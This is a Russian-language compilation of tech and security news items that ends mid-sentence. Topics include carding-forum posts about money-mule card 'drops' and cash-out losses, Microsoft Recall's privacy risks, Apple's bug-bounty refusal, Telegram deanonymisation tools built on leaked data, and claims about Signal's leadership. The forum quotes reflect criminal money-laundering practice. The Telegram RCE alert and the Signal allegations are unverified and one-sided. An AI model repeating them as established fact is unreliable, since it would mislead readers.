Сумма ущерба за май составила около 400 тысяч рублей. Частично GramotnoSuvazheniem выплатил деньги из своего кармана, отметив, что еще большее увеличение количества исковых заявлений может серьезно ударить по отрасли.
И тут вопрос: кто этот ущерб должен оплачивать теперь? Дроп или дроповод? Сервис по продаже карт, сервис по обналу, нальщик или лейка? Мой вариант — лейка. Только где взять лейку через год? Кому продал я карту, я-то знаю. А как он выяснит, с кем этот сервис работал?
Click to expand...
Другие пользователи форума подтвердили наличие проблемы. Travis Bickle рассказал, что в мае оплатил дропу 40 тысяч рублей из своего кармана, отметив, что это был «дроп из своих». При этом что делать с левыми дропами он не понимает, поскольку «платить за них особо и не хочется.
У нас за 2023 год пришло порядка 20 исполнительных дел в суд на дропов. И все иски были вынесены в пользу потерпевших. Суммы — от 140 тысяч до 900 тысяч рублей. Решением суда выносят приговор, на дропе остается ФССП. Все дела по факту незаконного обогащения.
Click to expand...
Некоторые из пользователей сочли проблему не столь значимой, заявив, что «дроп — это человек, на которого в итоге все и вешается». Другие увидели в подобном подходе опасную тенденцию, которая может привести к дисбалансу на обнал- рынках, а также к отказу дропов от сотрудничества.
К счастью, этот долг — не уголовный, списывается через процедуру банкротства! Думаю, сию методику отработают, и как ноу-хау будут запускать по всем дропам, даже вводить новую статью в УК за продажу карт не надо, достаточно рублем наказывать. Ждем резкого падения количества карт и роста цен.
Click to expand...
Image IMG-20240604-195547 hosted in ImgBB
ibb.co
Image IMG-20240604-195343-414 hosted in ImgBB
ibb.co
Image IMG-20240604-195740 hosted in ImgBB
ibb.co
Image IMG-20240604-200038 hosted in ImgBB
ibb.co
Image IMG-20240604-200222 hosted in ImgBB
ibb.co
Ранее на этой неделе компания Microsoft анонсировала новую ИИ-функцию в Windows 11, которая получила название Recall. Она фиксирует всю активность пользователя компьютера, а затем позволяет формировать отчеты и выполнять поиск по истории за последние три месяца. ИБ-эксперты уже называют Recall кошмаром с точки зрения конфиденциальности и безопасности.
Функция Recall была [анонсирована](https://blogs.microsoft.com/blog/2024/05/20/introducing- copilot-pcs/) 20 мая 2024 года, в рамках мероприятия, предваряющего скорый старт конференции Microsoft Build 2024.
В этом году компания всецело сосредоточена на искусственном интеллекте и Copilot, поэтому одним из главных анонсов недели стали компьютеры Copilot+, а также функция Recall, которая появится в Windows 11 (и будет работать как раз на машинах Copilot+).
Recall создана, чтобы помочь «вспомнить» любую информацию, которую пользователь просматривал в прошлом, и сделать ее доступной с помощью простого поиска. Так, функция делает снимок активного окна на экране каждые несколько секунд, записывая все, что происходит в Windows, будь то просмотр сайтов в браузере, общение в мессенджере или работа с другими приложениями. По умолчанию эти данные хранятся до трех месяцев (старые скриншоты будут заменяться новыми), и пользователь сможет выбирать, в каких приложениях можно делать снимки. Для работы Recall потребуется HDD или SSD объемом не менее 256 ГБ и как минимум 50 ГБ свободного места.
Полученные снимки будут обрабатываться нейронным процессором (Neural Processing Unit, NPU) устройства и ИИ-моделью для извлечения данных со скриншотов. Затем информация будет сохранена, и пользователи Windows смогут просматривать как историю скриншотов, так и осуществлять поиск по истории с помощью запросов на родном языке. В теории, это позволит легко найти, к примеру, прочитанное в прошлом месяце письмо или посещенный когда-то сайт.
Представители Microsoft подчеркнули, что все собранные данные шифруются с помощью BitLocker, привязанного к учетной записи пользователя в Windows, и не передаются другим пользователям на том же устройстве.
Как уже было упомянуто выше, Recall будет работать только на компьютерах
Copilot+ (также встречается написание Copilot Plus), которые компания тоже
[представила](https://blogs.microsoft.com/blog/2024/05/20/introducing-copilot-
pcs/) на этой неделе. Такие устройства вскоре будут предлагать Dell, Lenovo,
Samsung, HP, Acer и Asus. Кроме того, Microsoft выпустит два собственных
устройства, которые войдут в линейку Surface.

В Microsoft заявили, что эти решения способны выполнять более 40 TOPS
(триллионов операций в секунду), будут оснащаться нейронным процессором,
работать на базе Snapdragon X и Snapdragon X Plus, а также получат не менее 16
ГБ ОЗУ и 256 ГБ SSD. Сообщается, что в дальнейшем таких устройств станет
больше благодаря партнерству с Intel и AMD (начиная с Lunar Lake и Strix), а
текущие экземпляры уже превосходят MacBook Air на базе M3 почти на 58% по
многопоточной производительности.
Появление Recall вызвало шквал критики, как со стороны обычных пользователей, так и ИБ-специалистов. Хотя в своем анонсе Microsoft подчеркивает, что Recall разработана таким образом, чтобы все данные хранились только на устройстве пользователя в зашифрованном виде, многие полагают, что это создаст серьезные риски для конфиденциальности, и возникнет новый вектор атак, направленных на кражу данных.
«Recall — ключевая часть того, что делает компьютеры Copilot+ особенными, и Microsoft с самого начала заложила конфиденциальность в концепцию Recall, — заявляют разработчики. — На компьютерах Copilot+ с процессором Snapdragon серии X вы увидите значок Recall на панели задач после первой активации устройства. С помощью этого значка можно открыть настройки Recall и выбрать, какие снимки Recall собирает и хранит на вашем устройстве. Вы можете ограничить количество собираемых Recall снимков. Например, можете выбрать определенные приложения или сайты, посещенные в поддерживаемом браузере, чтобы исключить их из своих снимков. Кроме того, вы можете приостановить создание снимков с помощью значка Recall в системном трее, очистить некоторые или все сохраненные снимки, а также удалить все снимки со своего устройства».
Click to expand...
Кроме того, Microsoft заявляет, что Recall не будет создавать скриншоты окон в
режиме InPrivate в Microsoft Edge (и других браузерах на базе Chromium), а
также контента, защищенного DRM. Однако пока в компании не уточнили, будут ли
поддерживаться приватные режимы в других браузерах, например, в Firefox.


Словом, в компании уверяют, что индекс Recall будет «приватным, локальным и
безопасным» (то есть о передаче данных в облако и на серверы Microsoft речи не
идет), а также не будет использоваться для обучения каких-либо моделей
искусственного интеллекта, и пользователь сможет «полностью контролировать
ситуацию».
Стоит отметить, что Microsoft уже начала предоставлять более подробную техническую информацию о Recall, например, [о групповых политиках](https://learn.microsoft.com/en-us/windows/client-management/manage- recall#configure-policies-for-recall), которые можно использовать для отключения функции в масштабах компании.
Однако все эти обещания не помогли успокоить сообщество. Функцию критикуют практически все, начиная от простых пользователей (достаточно почитать комментарии к любой публикации о Recall и убедиться, что пользователи не доверяют заявлениям Microsoft) до Илона Маска, который уже сравнил анонс Recall с эпизодом сериала «Черное зеркало» и заявил, что сразу же отключит эту функциональность.
Также Recall уже [заинтересовалось](https://ico.org.uk/about-the-ico/media- centre/news-and-blogs/2024/05/statement-in-response-to-microsoft-recall- feature/) британское агентство по защите данных — Управление комиссара по информации (ICO), которое обратилось к Microsoft с запросом, чтобы убедиться, что данные людей действительно будут защищены должным образом и не будут использованы самой компанией.
«Мы ожидаем, что организации будут прозрачно информировать своих пользователей о том, как используются их данные, и обрабатывать персональные данные только в той мере, в какой это необходимо для достижения конкретной цели. Индустрия должна учитывать вопросы защиты данных с самого начала и тщательно оценивать и смягчать риски в отношении прав и свобод людей, прежде чем выводить продукты на рынок, — говорится в заявлении ICO. — Мы направили запрос в Microsoft, чтобы понять, какие меры защиты конфиденциальности пользователей были предприняты».
Click to expand...
Но, как отмечает издание Bleeping Computer, даже если представить, что Microsoft действительно не получит доступ к данным Recall, продукт все равно может нести серьезные риски для безопасности и конфиденциальности.
Так как Microsoft признает, что функция не выполняет модерацию контента, она будет просматривать буквально все, что видит, включая пароли в парольных менеджерах и номера счетов на банковских сайтах. Другой пример: если пользователь будет составлять в Word конфиденциальное соглашение, будет создан скриншот и этого документа.
К тому же, если компьютер используется совместно несколькими людьми, придется быть внимательнее к просматриваемым фотографиям и видео, поскольку они тоже будут записаны и сохранены Recall.
Хотя в настройках пользователь сможет запретить делать скриншоты конкретных приложений, специалисты опасаются, что большинство людей вообще не станут разбираться в настройках этой функции. В итоге вся информация будет храниться в удобном семантическом индексе Windows 11 и будет доступна для поиска всем, кто имеет доступ к компьютеру.
Хуже того, если злоумышленников или малварь скомпрометируют устройство пользователя, все данные Recall, защищенные Bitlocker, будут расшифрованы, то есть станут доступны и для хакера.
Таким образом, атакующие смогут попросту похитить базу данных Recall и выгрузить ее на собственные серверы для последующего анализа. Затем полученная информация может использоваться, например, для вымогательства или взлома учетных записей жертв, если учетные данные попадали в поле зрения Recall.
Известный ИБ-эксперт Кевин Бомонт (Kevin Beaumont), неоднократно выступавший с откровенной критикой в адрес Microsoft, [выразил обеспокоенность](https://doublepulsar.com/how-the-new-microsoft-recall- feature-fundamentally-undermines-windows-security-aa072829f218) тем, что новая функция создаст обширные возможности для атак, и сравнил Recall «с кейлоггером, встроенным в Windows».
«Если посмотреть на то, что исторически происходило с инфостилерами: они постепенно переходили к автоматическим кражам паролей браузеров, хранящихся локально, — пишет Бомонт. — Иными словами, если злоумышленник получает доступ к системе, он похищает важные базы данных, хранящиеся локально. [Хакеры] могут просто экстраполировать этот процесс, чтобы воровать еще и информацию, записанную функцией Recall».
Click to expand...
Хотя Бомонт пишет об инфостилерах, проблема не только в них. Так, малварь, которая нацелена на предприятия (например, TrickBot), порой тоже имеет модули для кражи БД Active Directory домена, чтобы поискать там учетные данные. Ничто не помешает таким вредоносам применить аналогичный подход и тоже начать похищать БД Recall.
«Лаборатории Касперского» выявила серьезные уязвимости в iPhone, но ничего не получила от Apple по программе Apple Security Bounty. Вознаграждение могло составить до $1 млн.
В выплатах отказано
Apple отказалась выплатить «Лаборатории Касперского» вознаграждение за обнаруженные в 2023 г. уязвимости в iOS, которые позволяли злоумышленниками внедрить шпионский модуль на любой iPhone, как выяснили в RTVI.
Международный технологический гигант сам объявил программу вознаграждения «белых хакеров» за поиск уязвимостей bug bounty и опубликовал информацию о ней на своем сайте. Для публики программа была открыта в 2019 г., называлась Apple Security Bounty и обещала выплаты до $1 млн.
«Мы нашли zero-day, zero-click уязвимости, передали всю информацию Apple, сделали полезное дело, — сказал Дмитрий Галов, руководитель российского исследовательского центра «Лаборатории Касперского. — Учитывая, сколько информации мы им предоставили и насколько проактивно это сделали — непонятно, почему они приняли такое решение».
Скупость или экономность?
Apple отказала в выплате заслуженного «Лабораторией Касперского» вознаграждения даже в пользу благотворительной организации. Галов рассказал, что такая практика существует. Объяснять причины в компании не стали, просто сослались на внутренние правила.
Можно было бы предположить, что дело в политике. Так международная платформа по поиску уязвимостей HackerOne не выплатила в 2022 г. белорусскому хакеру $25 тыс. так как он «находится в зоне санкций».
Но Apple так делала и раньше. The Washington Post в сентябре 2021 г. писала, что Apple допускает путаницу с платежами, длительные задержки и не всегда выплачивает все, что полагается. Седрик Оуэнс (Cedric Owens), например, заявил, что обнаружил серьезную ошибку, которая позволяла хакерам устанавливать вредоносное программное обеспечение на компьютеры Mac в обход принятых мер безопасности. Apple заплатила $5 тыс. долларов, или 5% от суммы, которую, по мнению Оуэнса, он заслуживал.
Николас Бруннер (Nicolas Brunner) получил от Apple благодарность вместо ожидаемых $50 тыс. за серьезную ошибку безопасности в системе отслеживания местоположения. Издание приводит и другие примеры.
«Лаборатории Касперского» тоже пострадала от уязвимостей Apple
Такая политика создает Apple плохую репутацию и гасит интерес к участию в bug bounty у исследователей. При этом нельзя сказать, что Apple в них не нуждается. В конце 2023 г. от хакерской атаки на смартфоны iPhone пострадали сотрудники «Лаборатории Касперского», которой теперь отказано в выплатах за найденные уязвимости.
Злоумышленники тогда проэксплуатировали широко известную уязвимость «Операция триангуляция», которая присутствовала в iOS на протяжении как минимум четырех лет. Apple закрыла ее лишь летом 2023 г. с релизом сборки iOS 16.5.1. Брешь содержалась в недокументированной аппаратной функции iPhone, о которой мало кто знал за пределами Apple и поставщиков чипов для ее смартфонов, а также британской компании ARM – разработчика одноименной процессорной архитектуры.
Устройства были заражены полнофункциональным шпионским ПО, которое, среди прочего, передавало записи с микрофона, фотографии, геолокацию и другие конфиденциальные данные на подконтрольные злоумышленникам серверы.
Защищенный мессенджер Signal, завоевавший популярность среди диссидентов по всему миру благодаря высокому уровню безопасности, оказался в центре внимания из-за возможных связей с американскими разведывательными структурами. В приложении, скачанном уже более 100 млн раз, по заявлениям компании, можно безопасно обмениваться информацией без риска преследований властями. В свое время о продукте высоко отозвались даже Эдвард Сноуден и Илон Маск.
Однако инсайдерские данные ставят под сомнение независимость Signal. Во- первых, проект изначально был профинансирован грантом в $3 млн от Open Technology Fund (OTF) — государственного фонда, ранее входившего в структуру антикоммунистической радиослужбы Radio Free Asia времен холодной войны. По словам анонимного источника из OTF, со временем стало ясно, что проект являлся «инициативой Госдепа, планировавшего использовать открытые интернет-разработки в интересах американской внешней политики».
Подозрение также вызывает тот факт, что председателем Signal Foundation сейчас является Кэтрин Махер, которая начинала карьеру в Национальном демократическом институте — некоммерческой организации, также финансируемой правительством США и действовавшей за рубежом в русле американских интересов. Во время арабской весны она курировала цифровые инициативы на Ближнем Востоке и в Северной Африке, налаживая связи с диссидентами и поддерживая «цветные революции» с помощью американских технологий.
Позже Махер возглавляла Wikimedia Foundation, а в этом году стала руководителем NPR. В Википедии она «боролась с дезинформацией» и признавалась, что согласовывала онлайн-цензуру с государственными структурами. Она открыто выступала за блокировку на цифровых платформах предполагаемых «фашистов», включая президента Трампа, и называла Первую поправку Конституции США главным препятствием в борьбе с вредоносным контентом.
По данным инсайдера, новый президент Signal Foundation, Мередит Уиттакер, предложила Махер возглавить совет директоров из-за ее связей с OTF и правозащитными НКО. Сама Уиттакер, ранее работавшая в Google, известна радикальными левыми взглядами и организацией масштабной забастовки в 2018 году.
По мнению исследователей, все это определенно должно насторожить американских пользователей. «Присутствие Махер в руководстве Signal вызывает тревогу, — заявляет аналитик Дж. Майкл Уоллер. — Для сторонницы смены режимов Signal, вероятно, представляет интерес как защищенный канал связи. Однако ее поддержка цензуры и явные связи со спецслужбами подрывают доверие к этому приложению». Создатель Ruby on Rails, Дэвид Хайнемайер Хансен, согласен, что после назначения Махер «доверять Signal Foundation станет гораздо труднее».
city-journal.org/article/signals-katherine-maher-problem
Российские ИТ-специалисты с большим опытом работы в большинстве своем не намерены работать в офисе. Удаленка для них – главное требование, возможность не появляться на территории работодателя им в разы важнее размера зарплаты.
Зарплата ничего не решает
У работников отечественной ИТ-сферы резко сменились приоритеты при поиске работы и выборе работодателя. Как сообщили CNews аналитики коммуникационного агентства iTrend, во главу угла ИТ-специалисты ставят вовсе не зарплату, несмотря на стремительный рост цен и официальную годовую инфляцию более 7% (данные Росстата).
Главный фактор для российских ИТ-кадров, по крайней мере, для мидлов и сеньоров – это наличие в списке предложений работодателя удаленной работы. Возможность трудиться, вообще не появляясь в офисе, важна 75% опытных ИТ- шников, и это первое место среди требований.
Мидл (англ. – middle), сеньор (англ. – senior), а также джун (англ. – junior) – общепринятые термины, указывающие на опытность ИТ-специалиста. Джун – едва влившийся в ИТ-сферу сотрудник, например, вчерашний выпускник профильного вуза, у которого почти нет знаний и опыта работы. Мидл – это следующий уровень. Знаний и опыта ощутимо больше, как и заплата, но всем этим пунктам он отстает от сеньора.
Как сообщал CNews, к концу осени 2023 г. удаленно работали 40% всех российских ИТ-специалистов. И 40% из них готовы без промедления написать заявление об увольнении в ответ на требование работодателя вернуться в офис.
Размер предлагаемой работодателем заработной платы, как ни странно, не вошел даже в первую пятерку по актуальности. Он заботит лишь около трети (33,3%) опытных работников ИТ-сферы, и это седьмое место в рейтинге.
Опрос проводился в марте 2024 г. – в нем приняли участие свыше 300 высокоуровневых ИТ-специалистов в возрасте от 25 лет, работающих в крупнейших ИТ-компаниях страны. Среди них – сотрудники компаний HRLink (занимается цифровизацией бизнес-процессов, в частности, кадрового документооборота), «Биржи грузоперевозок ATI.SU», софтверного интегратора MONT, разработчика и интегратора ПО Corpsoft24, разработчика систем хранения данных и систем визуализации «Аэродиск» и пр.
Устаревшие компании никому не нужны
Если возможность работы из дома, кафе, другого города или страны – самое часто встречающееся требование мидлов и сеньоров, то на втором месте – наличие у компании актуального стека технологий, в особенности программного обеспечения. Работать с устаревшим софтом не имеют никакого желания 70% опрощенных ИТ- специалистов. Замыкает топ-3 критериев выбора нового места работы возможность развития в профессии – обучаться чему-то новому и накапливать багаж знаний и навыков хотят 63% респондентов.
Четвертое место – у продукта, который создает работодатель. Это важный критерий выбора места работы для 62% опрошенных. Замыкают пятерку популярных ответов выбор работы по отзывам от знакомых — так поступают более 46% опрошенных.
В число менее значимых критериев попало наличие ДМС – 44% и шестое место. И лишь затем идет размер зарплаты (33,3%). Далее следуют наличие обустроенного офиса (25% – те, кому не нужна удаленка), известность бренда ИТ-компании (24%), возраст коллег (16%), первые места работодателя в отраслевых рейтингах (12%), а также упоминание компании в деловых и отраслевых СМИ (4%).
«В последние годы на рынке труда в ИТ сложились несколько новых тенденций. Так, появилась концепция «Работодатель-as-a-Service», в подходе которой сила бренда теряет свою значимость, а среди сотрудников преобладает идея «мне платят здесь и сейчас за определенную работу». При этом ИТ-компании выровнялись по основным параметрам, таким как условия труда, размер заработной платы, медицинское страхование, офисные условия и обучение», – сообщила CNews управляющий партнер iTrend Ася Власова.
Джунов никто не спрашивает
В опросе iTrend не участвовали начинающие специалисты, так называемые «джуны». За последние два года в российской ИТ-отрасли сформировалось вполне конкретное отношение работодателей к ним – еще в августе 2022 г. CNews писал, что их берут на работу с большой неохотой.
В современной России ИТ-джунами чаще всего являются выпускники онлайн-школ – это зачастую самый быстрый способ стать частью ИТ-индустрии, так как обучение некоторым профессиям длится всего пару месяцев. Однако, как сообщал CNews, работодатели весьма скептически относятся к соискателям, не имеющим профильного высшего образования и предоставляющим не диплом вуза, а сертификат выпускника онлайн-школы.
Тем временем, мидлов и сеньоров в российской ИТ-отрасли не хватает. CNews писал, что российские работодатели часто тратят до полугода на поиски ИТ- кадров с опытом работы. Некоторые компании готовы на работу специалистов без профильного образования, лишь бы у них был багаж необходимых знаний и навыков. И часто зарплатное предложение становится козырем – компании, готовые платить хорошие деньги за труд опытного ИТ-шника, закрывают вакансии в три раза быстрее.
«В условиях достатка и даже избытка специалистов на уровне junior (джуны – прим. CNews), специалистам уровня middle и senior есть, из чего выбирать. В день такие специалисты получают до 10 рабочих офферов. Это вынуждает бизнес жестко конкурировать за поиск и удержание опытных сотрудников, а также менять свой подход к выстраиванию HR-бренда, искать те медиа-площадки, которые обладают авторитетом у опытных ИТ-шников, и в целом уделять больше внимания коммуникациям», – сказала CNews Ася Власова.
Мнение работодателей
Как показывает практика, удаленную работу во главу угла ставят не только ИТ- специалисты, работающие в профильной организации. Аналогичная ситуация сложилась, к примеру, и в ритейле.
«Как и многие компании, мы столкнулись с тем, что в период пандемии многие сотрудники головного офиса, включая ИТ, эффективно работали удаленно из разных регионов России, – сообщили CNews представители группы «М.Видео-Эльдорадо». – Сейчас мы продолжаем искать и набирать ИТ-сотрудников со всей страны, опираясь, прежде всего, на компетенции специалистов. Мы заинтересованы в высокопотенциальных сотрудниках со всех регионов России, которые готовы развиваться, обучаться, брать на себя ответственные роли и задачи. В настоящее время в нашей компании «М.Тех» – разработчике ИТ-решений и digital-партнере группы «М.Видео-Эльдорадо» – мы выстраиваем гибридный график работы, который с одной стороны отвечает бизнес задачам компании, и при этом дает гибкость графика для сотрудников. То есть мы вполне выстраиваем гибридный график, понимая, что ИТ-специалистам это важно».
«Безусловно для многих специалистов возможность работать дистанционно – это преимущество. Однако нельзя сказать, что это актуально для всех сотрудников, – сказал CNews Федор Чернов, руководитель отдела развития корпоративного мессенджера Compass. – Часть специалистов после опыта вынужденной удаленки во время ковидного локдауна, наоборот отказываются от удаленки в пользу офиса. Это помогает сфокусироваться на работе и разделить личное и рабочее. Что касается нашей компании, мы рассматриваем и удаленку, и офисный формат работы. Но если сотрудник находится в городе присутствия компании, мы за то, чтобы специалист работал в офисе. Офисы в данном случае – ядра, вокруг которых объединяются удаленные сотрудники».
«В последние пару лет крупные ИТ-работодатели выровнялись по уровню зарплат, поэтому этот критерий уже не имеет такого значения, как раньше, – сказала CNews директор по развитию коммуникационного агентства iTrend Екатерина Саранцева. – Кроме того, специалисты уровня senior мыслят в формате хакатонов – они привыкли вести учет времени, считать стоимость часа и оценивать количество пользы, принесенной за этот час компании. В таком подходе они предпочитают направлять рабочее время на разработку продукта и не тратить его на менее приоритетные задачи, которые не приносят осязаемого результата - например, на дорогу».
В Казани правоохранители задержали иностранного мужчину, который подозревается в совершении преступления в области компьютерной информации. Он пытался улететь в Узбекистан, но при пограничном контроле его попросили задержаться для выяснения обстоятельств.
46-летнего иностранца обвиняют в создании, использовании и распространении вредоносных компьютерных программ.
В пограничной службе казанского аэропорта сообщили, что это уже 29 случай, когда они выявляют лица, находящиеся в федерально или международном розыске.
ВНИМАНИЕ
СРОЧНО ВЫРУБИТЕ НА ВСЕХ УСТРОЙСТВАХ ГДЕ СТОИТ TELEGRAM DESKTOP АВТОЗАГРУЗКУ МЕДИА
НЕ УЧЕБНАЯ ТРЕВОГА
Настройки - Продвинутые настройки - В личных чатах, группах, каналах ОТКЛЮЧИТЕ ВСЕ ГАЛОЧКИ ВО ВСЕХ ПУНКТАХ АВТОЗАГРУЗКИ МЕДИА
Нашли rce воспроизводится через видео плеер в Telegram. По этому самое безопасное решение отключить автозагрузку файлов.
Информация об самом эксплойте известна пока только в узких кругах
Довольно часто со стороны российских властей звучат крайне противоречивые заявления. Например, ещё в 2022 году предлагалось официально отменить запрет на скачивание пиратского программного обеспечения, игр и другой интеллектуальной собственности иностранных компаний, которые покинули российский рынок. Идея витала в воздухе, но в итоге потерялась в многочисленных кабинетах чиновников. Эксперты полагают, что главная причина заключается в интересах российских правообладателей. Согласитесь, если всем вокруг разрешить официально скачивать американские фильмы, то окажется довольно сложно защитить права российских кинематографистов. Пользователи просто не будут видеть разницу, а ведь есть ещё музыка, компьютерные игры и программное обеспечение, а значит проблема намного шире, чем может показаться. При этом Д. Медведев ратует за свободный доступ к авторскому праву компаний, которые присоединились к санкциям против РФ, тогда как другие профильные министерства категорически против такой идеи.
Считается, что официально российские власти против снятия табу с пиратского контента, но снизили требования к обычным пользователям, прекратив преследование приверженцев Весёлого Роджера. Похоже, некоторые российские чиновники не всегда осознают происходящие в стране изменения, о чём свидетельствует арест пенсионера в Липецке. Как стало известно, 65-летний Аркадий предоставлял услуги взлома игровых приставок производства Sony. Он устанавливал на консоли кастомную прошивку, а после закачивал туда пиратские игры, чем нарушал нормы действующего законодательства. Ну а согласно закону, пенсионеру грозит крупный штраф, который также может обернуться реальным тюремным сроком. Неясно, чем ещё занимался Аркадий, но следствие вменяет ему прошивку PlayStation 3. Это довольно старая консоль, которая уже давно не поддерживается японской компанией, поступившая в продажу в далёком 2006 году. Согласно официальной информации, пенсионер был отправлен домой после подписания подписки о невыезде. Его грозит штраф до 200 000 рубелей или тюремный срок до 2 лет заключения.
В данной истории удивляет абсолютно всё. Прежде всего непонятно, почему полиция Липецка арестовала именно 65-летнего пенсионера. Если изучить объявления в интернете, то можно найти целый ряд людей, которые продают взломанные PlayStation в этом же городе. По всей России таких умельцев тысячи, а особым спросом пользуется взломанная PlayStation 4. Туда ставится накопитель объёмом 512 Гб или 1 Тб, что позволяет закачать огромную библиотеку из популярных эксклюзивов. Кроме того, в ходе обыска в доме Аркадия было конфисковано оборудование, которое использовалось для прошивки консолей. Правоохранители вменяют пенсионеру причинение ущерба деловой репутации компании Sony Interactive Entertainment. Интересно, о какой репутации может идти речь, если японцы покинули пределы юридического пространства России ещё в 2022 году? В настоящее время против Аркадия возбуждено уголовное дело, а значит выйти сухим из воды пожилой взломщик не сможет.
Если суд будет учитывать обстоятельства отсутствия правообладателя, то дело может завершиться условным сроком, но и это в текущих условиях кажется слишком суровым. Чьи интересы защищают власти Липецка, понять в данном случае крайне сложно. Нужно понимать, что Sony не просто самоустранилась, но и сделала всё, чтобы усложнить жизнь российским пользователям. Проще говоря, если у вас есть игровая приставка японской компании, то купить легально для неё игру вы не можете. Выходит, что самого факта нарушения нет, поскольку получить доступ к лицензионному контенту на территории России крайне сложно. Чаще всего владельцы PlayStation разных моделей используют средства обхода IP-адреса. Другие регистрируются как граждане Аргентины, Турции и других стран, но есть также сложности с оплатой цифровых копий. Sony отказывается принимать платежи с российских пластиковых карт, а значит препятствия на пути обычного пользователя возникают на каждом этапе, когда ему хочется купить новую игру. Если пенсионер обратится к нормальному адвокату, который знаком с действиями японской компании, то дело может стать прецедентным и позволит всем российским геймерам получить индульгенцию от властей. Пока о конечном решении суда говорить рано, но в целом дело может быть прекращено ещё на этапе следствия.
Федеральные власти США запросили у Google имена, адреса и номера телефонов пользователей, которые с 1 по 8 января 2023 года смотрели на YouTube определённые видео. Запрос направлен в рамках расследования в отношении пользователя elonmuskwhm, которого подозревают в нарушении законов об отмывании денег.
Как сообщает Forbes, правоохранительные органы подозревают, что elonmuskwhm торгует криптовалютой, нарушая законы об отмывании денег, а также ведёт нелицензированный бизнес денежных переводов.
В рамках расследования агенты под прикрытием в начале января отправляли подозреваемым ссылки на учебные видеоролики на YouTube, и сейчас пытаются идентифицировать просмотревших. Видео при этом не были закрытыми и набрали около 30 000 просмотров, а это означает, что правительство запросило у Google личную информацию о довольно большом количестве пользователей.
На основании документов, с которыми ознакомился Forbes, суд удовлетворил постановление, но попросил Google держать его в секрете. Пока неизвестно, передала Google требуемые данные или нет.
Представитель компании сообщил Forbes, что Google следует «строгим процедурам» защиты конфиденциальности своих пользователей. Однако защитники конфиденциальности обеспокоены тем, что правительственные учреждения выходят за рамки и используют свои полномочия для получения личной информации о людях, которые случайно посмотрели определённые видеоролики, не сделав ничего противозаконного.
Пару месяцев назад я рассказал об одном достоверном случае, когда силовики использовали Telegram-бот с персональными данными для деанона человека в Telegram. Его вычислили и оштрафовали по статье «дискредитация армии» за комментарий в канале с региональными новостями. Скрин из бота, с помощью которого местные «эшники» нашли его, был приложен к материалам суда.
Теперь выяснилось, что и чиновники, и полицейские через госзакупки получают себе доступ к системе, которая, используя все те же слитые базы, позволяет им деанонить пользователей Telegram. Система называется «Инсайдер».
Как работают боты и «Инсайдер»
Telegram-боты (самый известный — «Глаз бога») и система «Инсайдер» работают по одному принципу. В них загружаются десятки миллионов мобильных номеров (в «Инсайдере» их более 76 миллионов) из утекших баз. Например, в «Инсайдере» — напомню, что доступ к нему оплачивается бюджетными деньгами! — это базы «Яндекс. Еды», Wildberries, «Спортмастера», «Сбер.Спасибо», «Московской электронной школы» и др.
Дальше эти телефоны мэтчатся (сопоставляются) с id пользователей в Telegram. Сейчас переведу на русский.
Id пользователей, смэтченные с телефонами в системе «Инсайдер»
Даже если у вас нет юзернейма в Telegram, а телефон скрыт, любой все равно может узнать ваш id — то есть уникальный цифровой номер вашего аккаунта. Вручную его можно увидеть в ссылке на ваш профиль в веб-версии мессенджера или в стороннем клиенте. Боты и «Инсайдер» берут его в автоматическом режиме, а затем проверяют, какой телефон соответствует этому id. Вместе с телефоном к id присоединяются имя, все известные адреса, места работы и другая информация из утекших баз.
Мэтч id и телефона — давняя уязвимость Telegram, которую Дуров так и не устранил до конца: это помогает расширять базу пользователей (когда человек ставит Telegram, он видит, кто из его контактов уже в мессенджере).
По похожему принципу работает и система «Охотник», которая принадлежит Ростеху и заточена на деанонимизацию администраторов Telegram-каналов.
Кто заказывает «Инсайдер»
Органы власти — включая региональные управления МВД — закупают «Инсайдер» в составе системы мониторинга соцсетей «Демон Лапласа».
Грозное имя «Демон Лапласа» используется в играх, кино и литературе, но изначально это мысленный эксперимент французского математика Пьера-Симона Лапласа, своего рода гимн «детерминизма»: у всего есть сущего есть причина, и «Демон Лапласа» способен постичь причины всего на свете. В случае соцсетями, очевидно, предполагается, что от этого всевидящего ока не скроется никто.
С помощью «Демона» власти могут следить за определенными группами/каналами/аккаунтами/чатами в «ВКонтакте», Telegram и почему-то никому не нужном Livejournal. Одна из задач «Демона» — поиск активистов протестных движений, фиксация «сетевых связей между активистами» и поиск любых сообщений по заданной тематике.
В «Инсайдер» загружены публичные чаты из Telegram: можно искать как по ключевым словам, так и, например, посмотреть все публичные сообщения конкретного пользователя.
В прошлом году контракты на поставку системы заключили как минимум три региональных управления МВД — по Чечне, Амурской области и Камчатскому краю. «Как минимум» — потому что я допускаю, что часть закупок «Демона Лапласа» скрыты. Среди гражданских заказчиков системы есть правительство Псковской области, а правительство Орловской вот-вот заключит контракт (техзадание недавно объявленного конкурса совпадает с техзаданиями по поставку «Демона Лапласа» для других госструктур). В среднем одна лицензия обходится в 500 тысяч рублей.
Кто разработчик «Инсайдера»
Про «Демон Лапласа» и его разработчика уже писали. Это 42-летний Евгений Венедиктов. Начинали свою карьеру в Великом Новгороде — работал на местном, ТВ, вел криминальную хронику. Потом уехал в Москву, трудился на НТВ, был активистом ЛДПР. В 14-м возил гуманитарную помощь в ЛДНР.
В конце 14-го его задержали в Великом Новгороде с 2,8 грамма героина, посадили в СИЗО. В этом нет никакой наркофобии, но, как мне кажется, важно для понимания его биографии. В следующем году Венедиктов получил три года условно с испытательным сроком в 4 года. Эти четыре года Венедиктов потратит на разработку и внедрение программы для мониторинга соцсетей и поиска там «экстремистского и деструктивного контента». И наладит взаимодействие с силовиками.
Евгений Венедиктов
Собственно, именно эту программу он и назвал «Демон Лапласа». В 2017-м о нем писала «Новая газета» — о найденных в соцсетях примерах «деструктивного контента» Венедиктов информировал местный центр «Э». Спустя пару лет он занялся деаноном пользователей Telegram и даже помог «Медузе» найти админа канала «Товарищ майор», где публиковались данные участников протеста. Сам Венедиктов говорил, что сделал это в обмен на рекламу своей системы.
Поиск по комментариям в Telegram в «Инсайдере»
Тогда, в 2019-м, у него в базе было 10 млн номеров. Сейчас — более 76 миллионов. Это понятно: из масштабных утечек персональных данных, которые были в 2022-2023, можно составить цифровой портрет почти всех россиян. Причем почти во всех случаях эти утечки были результатом российско-украинской кибервойны, когда украинские хакеры и их союзники со всего мира ломали сайты госорганов и компаний РФ, а потом публиковали скаченные базы в том же Telegram.
Сам Венедиктов не ответил на мои вопросы, которые я предвосхитил фразой: «Вы меня проверите, так что представление будет коротким».
А законно ли вообще все это
